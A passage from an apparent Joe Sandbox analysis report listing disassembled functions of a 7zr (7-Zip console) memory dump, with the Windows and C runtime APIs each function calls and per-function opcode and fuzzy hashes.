                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: H_prolog$ClearExceptionThrowVariant
                                                          • String ID: Cannot create output directory
                                                          • API String ID: 814188403-1181934277
                                                          • Opcode ID: 4299426d9ec0691271f334d4d4bd3698764da96ee50c84c2ff693b092434daaf
                                                          • Instruction ID: 7faf816c3a5bfb6d9d8294db830f5b38b6be5b96a90325837e4df36ebf2ccd4e
                                                          • Opcode Fuzzy Hash: 4299426d9ec0691271f334d4d4bd3698764da96ee50c84c2ff693b092434daaf
                                                          • Instruction Fuzzy Hash: BCF19D3190028DAFCF25EFE4C991AFDBBB5AF18300F1441AAF546A7252DB30AE55CB51
                                                          APIs
                                                          • fputs.MSVCRT ref: 00B0C840
                                                            • Part of subcall function 00AD25CB: _CxxThrowException.MSVCRT(?,00B84A58), ref: 00AD25ED
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: ExceptionThrowfputs
                                                          • String ID:
                                                          • API String ID: 1334390793-399585960
                                                          • Opcode ID: 4b8f9d922c286f3e5df9fcced689188824e55bdab165996b4013087363022d86
                                                          • Instruction ID: 42800a409db688d8790bdb5a648b704136037633e5b99ab356ef03d3c3d6572b
                                                          • Opcode Fuzzy Hash: 4b8f9d922c286f3e5df9fcced689188824e55bdab165996b4013087363022d86
                                                          • Instruction Fuzzy Hash: 6411B2716047449FDB15CF58C8C1BAABFE6EF49304F0485AEE1468B291D7B5BC44C760
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: fputs
                                                          • String ID: Open
                                                          • API String ID: 1795875747-71445658
                                                          • Opcode ID: 65a5876e0f55cb8acce5ea1d95be45f00405cc5230d6a0f46314e63b54e9969d
                                                          • Instruction ID: 10a970758f2de10274a5e1c55147031d230ec2c284c0644a047fced57673c6c1
                                                          • Opcode Fuzzy Hash: 65a5876e0f55cb8acce5ea1d95be45f00405cc5230d6a0f46314e63b54e9969d
                                                          • Instruction Fuzzy Hash: F4119A321057049FC720EF74D991ADABBE1EF24310F40896FE19A93252DB31A954CF50
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00B206B3
                                                          • _CxxThrowException.MSVCRT(?,00B8D480), ref: 00B208F2
                                                            • Part of subcall function 00AD1E0C: malloc.MSVCRT ref: 00AD1E1F
                                                            • Part of subcall function 00AD1E0C: _CxxThrowException.MSVCRT(?,00B84B28), ref: 00AD1E39
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: ExceptionThrow$H_prologmalloc
                                                          • String ID:
                                                          • API String ID: 3044594480-0
                                                          • Opcode ID: 1b5e71aa98bf14b176dd217b4f0ef51236c0d854f30b5438cbb8e452633c3230
                                                          • Instruction ID: da43343746f42b17ec00f407608031e558bf04bef5faa8b68804117509667391
                                                          • Opcode Fuzzy Hash: 1b5e71aa98bf14b176dd217b4f0ef51236c0d854f30b5438cbb8e452633c3230
                                                          • Instruction Fuzzy Hash: 78913A71900259DFCB21EFA8D881AEEBBF5FF09304F1441A9E459A7252DB30AE45CF61
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID:
                                                          • API String ID: 3519838083-0
                                                          • Opcode ID: 7ae330f6993c99ab2466dc369287c5c58d3b5f0bb7ce72de20c9ee3c9713a6ac
                                                          • Instruction ID: 709bc9781f2bf6e3eefdae50687d64cba37235128422ca9e79f6411c2e7c80a6
                                                          • Opcode Fuzzy Hash: 7ae330f6993c99ab2466dc369287c5c58d3b5f0bb7ce72de20c9ee3c9713a6ac
                                                          • Instruction Fuzzy Hash: C1F1BB71A047C5DFCF25DF65C590AAABBF1BF28344F144CAEE49A9B211D730A944CB21
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00AE4255
                                                            • Part of subcall function 00AE440B: __EH_prolog.LIBCMT ref: 00AE4410
                                                            • Part of subcall function 00AD1E0C: malloc.MSVCRT ref: 00AD1E1F
                                                            • Part of subcall function 00AD1E0C: _CxxThrowException.MSVCRT(?,00B84B28), ref: 00AD1E39
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: H_prolog$ExceptionThrowmalloc
                                                          • String ID:
                                                          • API String ID: 3744649731-0
                                                          • Opcode ID: 22eb2b502d9337fb0edd0f4d3976c4fed682d5c199d36c1ed0def790207a9527
                                                          • Instruction ID: c4f30cc818543523342099305d6b23b94e0acf319c59f7b992ce044a2858dd32
                                                          • Opcode Fuzzy Hash: 22eb2b502d9337fb0edd0f4d3976c4fed682d5c199d36c1ed0def790207a9527
                                                          • Instruction Fuzzy Hash: E351F5B1401B84CFC725DF69C28468AFBF4BF19304F5489AEC4AE97752D7B0A608CB61
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID:
                                                          • API String ID: 3519838083-0
                                                          • Opcode ID: e1cdffe59bb4ececcd820c9abf45c8a6708de023144ec3c3affcf26bc656a524
                                                          • Instruction ID: 481a9dab91b568ec5b8bb2f7e1ef375b87fbace76706a30e13e233ab8f71a7de
                                                          • Opcode Fuzzy Hash: e1cdffe59bb4ececcd820c9abf45c8a6708de023144ec3c3affcf26bc656a524
                                                          • Instruction Fuzzy Hash: 6E31F8B1900209DBCB14EF95C991CBEFBB5FF94364B208559F62AA7252C7709D01CBA0
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00AF021F
                                                            • Part of subcall function 00AE3D66: __EH_prolog.LIBCMT ref: 00AE3D6B
                                                            • Part of subcall function 00AE3D66: GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00AE3D7D
                                                            • Part of subcall function 00AE3D66: OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00AE3D94
                                                            • Part of subcall function 00AE3D66: LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00AE3DB6
                                                            • Part of subcall function 00AE3D66: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00AE3DCB
                                                            • Part of subcall function 00AE3D66: GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00AE3DD5
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: H_prologProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                          • String ID:
                                                          • API String ID: 1532160333-0
                                                          • Opcode ID: 5aa4a20914154aff2be19f9393429f41b2b900ad9b29114787dd95fd43b3bb7a
                                                          • Instruction ID: c2e2f129d67e635f3c7867ffc5aae5758f74798365d9ee720afc7cab522ed4d4
                                                          • Opcode Fuzzy Hash: 5aa4a20914154aff2be19f9393429f41b2b900ad9b29114787dd95fd43b3bb7a
                                                          • Instruction Fuzzy Hash: 7C2139B1846B90CFC321CF6B86D0686FFF4BB19600B9499AED1DA83B12C374A508CF55
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00B0C0B8
                                                            • Part of subcall function 00AF7193: __EH_prolog.LIBCMT ref: 00AF7198
                                                            • Part of subcall function 00AD1E40: free.MSVCRT ref: 00AD1E44
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: H_prolog$free
                                                          • String ID:
                                                          • API String ID: 2654054672-0
                                                          • Opcode ID: 1a007983d913b522ea2afc5eaa0c211466b32329b39906e07426805cd2be281a
                                                          • Instruction ID: 51d1132713752a5bd4acc528668f88af50743118a30c4759a24544ff398d16a8
                                                          • Opcode Fuzzy Hash: 1a007983d913b522ea2afc5eaa0c211466b32329b39906e07426805cd2be281a
                                                          • Instruction Fuzzy Hash: 10F0B472A00211DBD725AB89D9817AEFBE9EF54760F1002AFE402A7651DFB1DC10C690
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00B10364
                                                            • Part of subcall function 00B101C4: __EH_prolog.LIBCMT ref: 00B101C9
                                                            • Part of subcall function 00B10143: __EH_prolog.LIBCMT ref: 00B10148
                                                            • Part of subcall function 00AD1E40: free.MSVCRT ref: 00AD1E44
                                                            • Part of subcall function 00B103D8: __EH_prolog.LIBCMT ref: 00B103DD
                                                            • Part of subcall function 00B1004A: __EH_prolog.LIBCMT ref: 00B1004F
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: H_prolog$free
                                                          • String ID:
                                                          • API String ID: 2654054672-0
                                                          • Opcode ID: 8ab04823c3890bedcef6c9bba16d3596913eb3db7a8b584c81d5ac71205ceb70
                                                          • Instruction ID: 94942024bb1fe16699b9a241a244591643a24ece6721e333b48fee06fe141930
                                                          • Opcode Fuzzy Hash: 8ab04823c3890bedcef6c9bba16d3596913eb3db7a8b584c81d5ac71205ceb70
                                                          • Instruction Fuzzy Hash: 56F0D131924A50EECB19FBA8D5223EDBBE4AF04314F50469DE066622D2CFF85A448744
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID:
                                                          • API String ID: 3519838083-0
                                                          • Opcode ID: a6148cdafad731cd5c77807d6e8acd0dba3005066e0cc64dcc509e696b704690
                                                          • Instruction ID: f2e7c83fe34c43a4a5a9fb13388af146218d729910eb902bca2995f6006742f7
                                                          • Opcode Fuzzy Hash: a6148cdafad731cd5c77807d6e8acd0dba3005066e0cc64dcc509e696b704690
                                                          • Instruction Fuzzy Hash: 7EF04F72E1111AABCB14DF98D8409AFBBB5FF54750B14819AF456E7251CB348A05CB90
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: fputs
                                                          • String ID:
                                                          • API String ID: 1795875747-0
                                                          • Opcode ID: aff8ad7d0de46af7325ec9bce5131739cfed69abb1bc43db1b07abd079a5a46f
                                                          • Instruction ID: 611287775430d138f30085da5a573debfb4dbc5eea8b5bbf0dc9931fbb22f459
                                                          • Opcode Fuzzy Hash: aff8ad7d0de46af7325ec9bce5131739cfed69abb1bc43db1b07abd079a5a46f
                                                          • Instruction Fuzzy Hash: 8AD01232504119ABCF156B94DC05CDD7BBCEF08214700442FF545F2150EA75E5149794
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00B280AF
                                                            • Part of subcall function 00AD1E0C: malloc.MSVCRT ref: 00AD1E1F
                                                            • Part of subcall function 00AD1E0C: _CxxThrowException.MSVCRT(?,00B84B28), ref: 00AD1E39
                                                            • Part of subcall function 00B1BDB5: __EH_prolog.LIBCMT ref: 00B1BDBA
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: H_prolog$ExceptionThrowmalloc
                                                          • String ID:
                                                          • API String ID: 3744649731-0
                                                          • Opcode ID: eff143f9bf7641e780f659d53d8d798f8596b1b77e41f721e96e7ce0942859e8
                                                          • Instruction ID: e3d30c95a3eef0c9575f1401dc75e1c3f91151d86421da87ecda1e0d05fa978c
                                                          • Opcode Fuzzy Hash: eff143f9bf7641e780f659d53d8d798f8596b1b77e41f721e96e7ce0942859e8
                                                          • Instruction Fuzzy Hash: F0D01771A01101AECB08EBB4A52276E72E1EB44300F0045BEA02AE2781EF7489008614
                                                          APIs
                                                          • FindClose.KERNELBASE(00000000,?,00AD6880), ref: 00AD6853
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: CloseFind
                                                          • String ID:
                                                          • API String ID: 1863332320-0
                                                          • Opcode ID: 0cb1fd9f7882285fe93640b6c26667334d89ada4243a789385f5fd640a64b6b7
                                                          • Instruction ID: e7da4007c617df9e9b8d4b593da8d53891715fa6b7321c9a775dac79fedaca31
                                                          • Opcode Fuzzy Hash: 0cb1fd9f7882285fe93640b6c26667334d89ada4243a789385f5fd640a64b6b7
                                                          • Instruction Fuzzy Hash: 2CD01231104221468A645F7D78449C937D86F06334321075EF0B5D32E1D7608CC36650
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: fputs
                                                          • String ID:
                                                          • API String ID: 1795875747-0
                                                          • Opcode ID: 0103f33fc7c149f85b2973f150387715554e0c66a5a7bece25675265a67891fb
                                                          • Instruction ID: 5414ab28a329f011401210a2df01f787385fd392670e05e3ba97096d124c1e38
                                                          • Opcode Fuzzy Hash: 0103f33fc7c149f85b2973f150387715554e0c66a5a7bece25675265a67891fb
                                                          • Instruction Fuzzy Hash: A3D0C936008251AF96256F15EC09C8BBFA9FFE5321721082FF480921709B626D65DAA0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: memmove
                                                          • String ID:
                                                          • API String ID: 2162964266-0
                                                          • Opcode ID: ed249ee924b42af0abd0b936601cf7d20be81bb0e5d72fcf70d319d92c18dab8
                                                          • Instruction ID: cbf9e08a5555efca76e0e3ee0de8521240d211f30687367cbea6b668dc3c7d75
                                                          • Opcode Fuzzy Hash: ed249ee924b42af0abd0b936601cf7d20be81bb0e5d72fcf70d319d92c18dab8
                                                          • Instruction Fuzzy Hash: 34814C71E0424AAFCF14CFA8C584AEEBBB1BF48324F54956AE512A7341D771EA80CF50
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: malloc
                                                          • String ID:
                                                          • API String ID: 2803490479-0
                                                          • Opcode ID: f6689b844a0abd90852679766297054ea5ad023363036feb97c819a96c7c6895
                                                          • Instruction ID: 10ec1b3ccdf6cefded33c2c02c9dd30b4434cfe30a9cc7523912114a8053f0f8
                                                          • Opcode Fuzzy Hash: f6689b844a0abd90852679766297054ea5ad023363036feb97c819a96c7c6895
                                                          • Instruction Fuzzy Hash: AFD0C9A162360706EF484A30484BB6A22D46B5031BBA885F8AC16CB291FB19D61D9258
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000), ref: 00B56B31
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 41b6787ff6aeb38a8c4cb08e5eddf1ceada6a52224bc52a2eaed526b7f7a511a
                                                          • Instruction ID: 8fb7cd5613bafa0fad3d47cb14245c26c4587c61b45aac685d9cd313bcac4a26
                                                          • Opcode Fuzzy Hash: 41b6787ff6aeb38a8c4cb08e5eddf1ceada6a52224bc52a2eaed526b7f7a511a
                                                          • Instruction Fuzzy Hash: E7C02BE1A4D280DFDF0213109C40B603F308F83300F0A00C9E4085B0D3C6041C0CC763
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: malloc
                                                          • String ID:
                                                          • API String ID: 2803490479-0
                                                          • Opcode ID: a1e9458a9ade6dcfe768eb88d97769c87549e2230f9edfc2c16aad58367e7da2
                                                          • Instruction ID: 30ff8c9d703fd4a00493e18c0eabbf5a437b67ce6d430cfa31e7bfbfb9121104
                                                          • Opcode Fuzzy Hash: a1e9458a9ade6dcfe768eb88d97769c87549e2230f9edfc2c16aad58367e7da2
                                                          • Instruction Fuzzy Hash: 4DA024CD51304101FD1C11303C0153710C013503077C014FC7C05C1101F71DD50C1045
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: malloc
                                                          • String ID:
                                                          • API String ID: 2803490479-0
                                                          • Opcode ID: 3fa4672c4b6bd134d2e796e347ec7e9f7655e2c8d42b0b7908dcec06aed2b463
                                                          • Instruction ID: 97405230ee4d15145f56f5fc1024e26be198807dd6f96e103afc8d5aa350bdf3
                                                          • Opcode Fuzzy Hash: 3fa4672c4b6bd134d2e796e347ec7e9f7655e2c8d42b0b7908dcec06aed2b463
